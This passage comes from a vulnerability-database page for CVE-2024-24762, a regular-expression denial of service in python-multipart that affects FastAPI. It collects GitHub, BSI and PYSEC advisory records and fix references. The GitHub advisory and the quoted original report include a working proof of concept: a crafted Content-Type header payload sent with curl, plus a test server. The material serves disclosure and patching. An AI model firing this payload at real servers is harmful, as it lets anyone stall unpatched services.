L586](https://github.com/tiangolo/fastapi/blob/d74b3b25659b42233a669f032529880de8bd6c2d/fastapi/params.py#L586)

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.0.6"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "python-multipart"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-24762"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-02-12T17:28:12Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\nWhen using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options.\n\nAn attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can\u0027t handle any more requests.\n\nThis can create a ReDoS (Regular expression Denial of Service): https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS\n\nThis only applies when the app uses form data, parsed with `python-multipart`.\n\n### Details\n\nA regular HTTP `Content-Type` header could look like:\n\n```\nContent-Type: text/html; charset=utf-8\n```\n\n`python-multipart` parses the option with this RegEx: https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74\n\nA custom option could be made and sent to the server to break it with:\n\n```\nContent-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\n```\n\n### PoC\n\nCreate a simple WSGI application, that just parses the `Content-Type`, and run it with `python main.py`:\n\n```Python\n# main.py\nfrom wsgiref.simple_server import make_server\nfrom wsgiref.validate import validator\n\nfrom multipart.multipart import parse_options_header\n\n\ndef simple_app(environ, start_response):\n    _, _ = parse_options_header(environ[\"CONTENT_TYPE\"])\n\n    start_response(\"200 OK\", [(\"Content-type\", \"text/plain\")])\n    return [b\"Ok\"]\n\n\nhttpd = make_server(\"\", 8123, validator(simple_app))\nprint(\"Serving on port 8123...\")\nhttpd.serve_forever()\n```\n\nThen send the attacking request with:\n\n```console\n$ curl -v -X \u0027POST\u0027 -H $\u0027Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\u0027 --data-binary \u0027input=1\u0027 \u0027http://localhost:8123/\u0027\n```\n\n### Impact\n\nThis is a ReDoS, (Regular expression Denial of Service), so it only applies to those using python-multipart to read form data, such as Starlette and FastAPI.\n\n### Original Report\n\nThis was originally reported to FastAPI as an email to security@tiangolo.com, sent via https://huntr.com/, the original reporter is Marcello, https://github.com/byt3bl33d3r\n\n\u003cdetails\u003e\n\u003csummary\u003eOriginal report to FastAPI\u003c/summary\u003e\n\nHey Tiangolo!\n\nMy name\u0027s Marcello and I work on the ProtectAI/Huntr Threat Research team, a few months ago we got a report (from @nicecatch2000) of a ReDoS affecting another very popular Python web framework. After some internal research, I found that FastAPI is vulnerable to the same ReDoS under certain conditions (only when it parses Form data not JSON).\n\nHere are the details: I\u0027m using the latest version of FastAPI (0.109.0) and the following code:\n\n```Python\nfrom typing import Annotated\nfrom fastapi.responses import HTMLResponse\nfrom fastapi import FastAPI,Form\nfrom pydantic import BaseModel\n\nclass Item(BaseModel):\n    username: str\n\napp = FastAPI()\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def index():\n    return HTMLResponse(\"Test\", status_code=200)\n\n@app.post(\"/submit/\")\nasync def submit(username: Annotated[str, Form()]):\n    return {\"username\": username}\n\n@app.post(\"/submit_json/\")\nasync def submit_json(item: Item):\n    return {\"username\": item.username}\n```\n\nI\u0027m running the above with uvicorn with the following command:\n\n```console\nuvicorn server:app\n```\n\nThen run the following cUrl command:\n\n```\ncurl -v -X \u0027POST\u0027 -H $\u0027Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\u0027 --data-binary \u0027input=1\u0027 \u0027http://localhost:8000/submit/\u0027\n```\n\nYou\u0027ll see the server locks up, is unable to serve anymore requests and one CPU core is pegged to 100%\n\nYou can even start uvicorn with multiple workers with the --workers 4 argument and as long as you send (workers + 1) requests you\u0027ll completely DoS the FastApi server.\n\nIf you try submitting Json to the /submit_json endpoint with the malicious Content-Type header you\u0027ll see it isn\u0027t vulnerable. So this only affects FastAPI when it parses Form data.\n\nCheers\n\n#### Impact\n\nAn attacker is able to cause a DoS on a FastApi server via a malicious Content-Type header if it parses Form data.\n\n#### Occurrences\n\n[params.py L586](https://github.com/tiangolo/fastapi/blob/d74b3b25659b42233a669f032529880de8bd6c2d/fastapi/params.py#L586)\n\n\u003c/details\u003e",
  "id": "GHSA-2jv5-9r88-3w3p",
  "modified": "2024-09-24T15:58:43Z",
  "published": "2024-02-12T17:28:12Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24762"
    },
    {
      "type": "WEB",
      "url": "https://github.com/github/advisory-database/pull/4829"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4"
    },
    {
      "type": "WEB",
      "url": "https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5"
    },
    {
      "type": "WEB",
      "url": "https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Kludex/python-multipart"
    },
    {
      "type": "WEB",
      "url": "https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/fastapi/PYSEC-2024-38.yaml"
    },
    {
      "type": "WEB",
      "url": "https://github.com/tiangolo/fastapi/releases/tag/0.109.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "python-multipart vulnerable to Content-Type Header ReDoS"
}

wid-sec-w-2024-0592

Vulnerability from csaf_certbund

Published

2024-03-10 23:00

Modified

2024-04-01 22:00

Summary

IBM App Connect Enterprise: Schwachstelle ermöglicht Denial of Service

Notes

Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.

Produktbeschreibung

IBM App Connect Enterprise kombiniert die branchenbewährten Technologien des IBM Integration Bus mit Cloud-nativen Technologien.

Angriff

Ein entfernter, anonymer Angreifer kann eine Schwachstelle in IBM App Connect Enterprise ausnutzen, um einen Denial of Service Angriff durchzuführen.

Betroffene Betriebssysteme

- Sonstiges

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "text": "mittel"
    },
    "category": "csaf_base",
    "csaf_version": "2.0",
    "distribution": {
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "de-DE",
    "notes": [
      {
        "category": "legal_disclaimer",
        "text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
      },
      {
        "category": "description",
        "text": "IBM App Connect Enterprise kombiniert die branchenbew\u00e4hrten Technologien des IBM Integration Bus mit Cloud-nativen Technologien.",
        "title": "Produktbeschreibung"
      },
      {
        "category": "summary",
        "text": "Ein entfernter, anonymer Angreifer kann eine Schwachstelle in IBM App Connect Enterprise ausnutzen, um einen Denial of Service Angriff durchzuf\u00fchren.",
        "title": "Angriff"
      },
      {
        "category": "general",
        "text": "- Sonstiges",
        "title": "Betroffene Betriebssysteme"
      }
    ],
    "publisher": {
      "category": "other",
      "contact_details": "csaf-provider@cert-bund.de",
      "name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
      "namespace": "https://www.bsi.bund.de"
    },
    "references": [
      {
        "category": "self",
        "summary": "WID-SEC-W-2024-0592 - CSAF Version",
        "url": "https://wid.cert-bund.de/.well-known/csaf/white/2024/wid-sec-w-2024-0592.json"
      },
      {
        "category": "self",
        "summary": "WID-SEC-2024-0592 - Portal Version",
        "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2024-0592"
      },
      {
        "category": "external",
        "summary": "IBM Security Bulletin vom 2024-03-10",
        "url": "https://www.ibm.com/support/pages/node/7130872"
      },
      {
        "category": "external",
        "summary": "Proof of Concept (PoC)",
        "url": "https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389"
      },
      {
        "category": "external",
        "summary": "IBM Security Bulletin 7145680 vom 2024-04-02",
        "url": "https://www.ibm.com/support/pages/node/7145680"
      }
    ],
    "source_lang": "en-US",
    "title": "IBM App Connect Enterprise: Schwachstelle erm\u00f6glicht Denial of Service",
    "tracking": {
      "current_release_date": "2024-04-01T22:00:00.000+00:00",
      "generator": {
        "date": "2024-08-15T18:06:17.543+00:00",
        "engine": {
          "name": "BSI-WID",
          "version": "1.3.5"
        }
      },
      "id": "WID-SEC-W-2024-0592",
      "initial_release_date": "2024-03-10T23:00:00.000+00:00",
      "revision_history": [
        {
          "date": "2024-03-10T23:00:00.000+00:00",
          "number": "1",
          "summary": "Initiale Fassung"
        },
        {
          "date": "2024-04-01T22:00:00.000+00:00",
          "number": "2",
          "summary": "Neue Updates von IBM aufgenommen"
        }
      ],
      "status": "final",
      "version": "2"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version_range",
                "name": "Certified Container Operator \u003c 11.3.0",
                "product": {
                  "name": "IBM App Connect Enterprise Certified Container Operator \u003c 11.3.0",
                  "product_id": "T033353"
                }
              },
              {
                "category": "product_version_range",
                "name": "DesignerAuthoring \u003c 12.0.11.2-r1",
                "product": {
                  "name": "IBM App Connect Enterprise DesignerAuthoring \u003c 12.0.11.2-r1",
                  "product_id": "T033354"
                }
              },
              {
                "category": "product_version_range",
                "name": "Certified Container Operator \u003c 5.0.15",
                "product": {
                  "name": "IBM App Connect Enterprise Certified Container Operator \u003c 5.0.15",
                  "product_id": "T033355"
                }
              }
            ],
            "category": "product_name",
            "name": "App Connect Enterprise"
          },
          {
            "branches": [
              {
                "category": "product_version_range",
                "name": "\u003c 23.0.2-IF003",
                "product": {
                  "name": "IBM Business Automation Workflow \u003c 23.0.2-IF003",
                  "product_id": "T033813"
                }
              }
            ],
            "category": "product_name",
            "name": "Business Automation Workflow"
          }
        ],
        "category": "vendor",
        "name": "IBM"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2024-24762",
      "notes": [
        {
          "category": "description",
          "text": "Es besteht eine Schwachstelle in IBM App Connect Enterprise. Dieser Fehler besteht in der FastAPI aufgrund eines Denial-of-Service-Problems durch regul\u00e4re Ausdr\u00fccke (ReDos). Durch Senden einer speziell gestalteten Regex-Eingabe kann ein entfernter, anonymer Angreifer diese Schwachstelle ausnutzen, um einen Denial-of-Service-Zustand zu verursachen."
        }
      ],
      "product_status": {
        "known_affected": [
          "T033813"
        ]
      },
      "release_date": "2024-03-10T23:00:00.000+00:00",
      "title": "CVE-2024-24762"
    }
  ]
}

pysec-2024-38

Vulnerability from pysec

Published

2024-02-05 15:15

Modified

2024-02-16 18:22

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Details

FastAPI is a web framework for building APIs with Python 3.8+ based on standard Python type hints. When using form data, python-multipart uses a Regular Expression to parse the HTTP Content-Type header, including options. An attacker could send a custom-made Content-Type option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests. It's a ReDoS(Regular expression Denial of Service), it only applies to those reading form data, using python-multipart. This vulnerability has been patched in version 0.109.1.

Impacted products

Name	purl
fastapi	pkg:pypi/fastapi

Aliases

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "fastapi",
        "purl": "pkg:pypi/fastapi"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc"
            }
          ],
          "repo": "https://github.com/tiangolo/fastapi",
          "type": "GIT"
        },
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.109.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "0.1.0",
        "0.1.10",
        "0.1.11",
        "0.1.12",
        "0.1.13",
        "0.1.14",
        "0.1.15",
        "0.1.16",
        "0.1.17",
        "0.1.18",
        "0.1.19",
        "0.1.2",
        "0.1.3",
        "0.1.4",
        "0.1.5",
        "0.1.6",
        "0.1.7",
        "0.1.8",
        "0.1.9",
        "0.10.0",
        "0.10.1",
        "0.10.2",
        "0.100.0",
        "0.100.0b1",
        "0.100.0b2",
        "0.100.0b3",
        "0.100.1",
        "0.101.0",
        "0.101.1",
        "0.102.0",
        "0.103.0",
        "0.103.1",
        "0.103.2",
        "0.104.0",
        "0.104.1",
        "0.105.0",
        "0.106.0",
        "0.107.0",
        "0.108.0",
        "0.109.0",
        "0.11.0",
        "0.12.0",
        "0.12.1",
        "0.13.0",
        "0.14.0",
        "0.15.0",
        "0.16.0",
        "0.17.0",
        "0.18.0",
        "0.19.0",
        "0.2.0",
        "0.2.1",
        "0.20.0",
        "0.20.1",
        "0.21.0",
        "0.22.0",
        "0.23.0",
        "0.24.0",
        "0.25.0",
        "0.26.0",
        "0.27.0",
        "0.27.1",
        "0.27.2",
        "0.28.0",
        "0.29.0",
        "0.29.1",
        "0.3.0",
        "0.30.0",
        "0.30.1",
        "0.31.0",
        "0.32.0",
        "0.33.0",
        "0.34.0",
        "0.35.0",
        "0.36.0",
        "0.37.0",
        "0.38.0",
        "0.38.1",
        "0.39.0",
        "0.4.0",
        "0.40.0",
        "0.41.0",
        "0.42.0",
        "0.43.0",
        "0.44.0",
        "0.44.1",
        "0.45.0",
        "0.46.0",
        "0.47.0",
        "0.47.1",
        "0.48.0",
        "0.49.0",
        "0.49.1",
        "0.49.2",
        "0.5.0",
        "0.5.1",
        "0.50.0",
        "0.51.0",
        "0.52.0",
        "0.53.0",
        "0.53.1",
        "0.53.2",
        "0.54.0",
        "0.54.1",
        "0.54.2",
        "0.55.0",
        "0.55.1",
        "0.56.0",
        "0.56.1",
        "0.57.0",
        "0.58.0",
        "0.58.1",
        "0.59.0",
        "0.6.0",
        "0.6.1",
        "0.6.2",
        "0.6.3",
        "0.6.4",
        "0.60.0",
        "0.60.1",
        "0.60.2",
        "0.61.0",
        "0.61.1",
        "0.61.2",
        "0.62.0",
        "0.63.0",
        "0.64.0",
        "0.65.0",
        "0.65.1",
        "0.65.2",
        "0.65.3",
        "0.66.0",
        "0.66.1",
        "0.67.0",
        "0.68.0",
        "0.68.1",
        "0.68.2",
        "0.69.0",
        "0.7.0",
        "0.7.1",
        "0.70.0",
        "0.70.1",
        "0.71.0",
        "0.72.0",
        "0.73.0",
        "0.74.0",
        "0.74.1",
        "0.75.0",
        "0.75.1",
        "0.75.2",
        "0.76.0",
        "0.77.0",
        "0.77.1",
        "0.78.0",
        "0.79.0",
        "0.79.1",
        "0.8.0",
        "0.80.0",
        "0.81.0",
        "0.82.0",
        "0.83.0",
        "0.84.0",
        "0.85.0",
        "0.85.1",
        "0.85.2",
        "0.86.0",
        "0.87.0",
        "0.88.0",
        "0.89.0",
        "0.89.1",
        "0.9.0",
        "0.9.1",
        "0.90.0",
        "0.90.1",
        "0.91.0",
        "0.92.0",
        "0.93.0",
        "0.94.0",
        "0.94.1",
        "0.95.0",
        "0.95.1",
        "0.95.2",
        "0.96.0",
        "0.96.1",
        "0.97.0",
        "0.98.0",
        "0.99.0",
        "0.99.1"
      ]
    }
  ],
  "aliases": [
    "CVE-2024-24762",
    "GHSA-qf9m-vfgh-m389"
  ],
  "details": "FastAPI is a web framework for building APIs with Python 3.8+ based on standard Python type hints. When using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options. An attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can\u0027t handle any more requests. It\u0027s a ReDoS(Regular expression Denial of Service), it only applies to those reading form data, using `python-multipart`. This vulnerability has been patched in version 0.109.1.",
  "id": "PYSEC-2024-38",
  "modified": "2024-02-16T18:22:32.607118+00:00",
  "published": "2024-02-05T15:15:00+00:00",
  "references": [
    {
      "type": "EVIDENCE",
      "url": "https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389"
    },
    {
      "type": "FIX",
      "url": "https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc"
    },
    {
      "type": "WEB",
      "url": "https://github.com/tiangolo/fastapi/releases/tag/0.109.1"
    }
  ],
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2024-24762 (GCVE-0-2024-24762)

Vulnerability from cvelistv5

gsd-2024-24762

Vulnerability from gsd

fkie_cve-2024-24762

Vulnerability from fkie_nvd

opensuse-su-2024:13664-1

Vulnerability from csaf_opensuse

opensuse-su-2024:13684-1

Vulnerability from csaf_opensuse

ghsa-2jv5-9r88-3w3p

Vulnerability from github

Summary

Details

PoC

main.py

Impact

Original Report

wid-sec-w-2024-0592

Vulnerability from csaf_certbund

pysec-2024-38

Vulnerability from pysec

Tags

Sightings

Nomenclature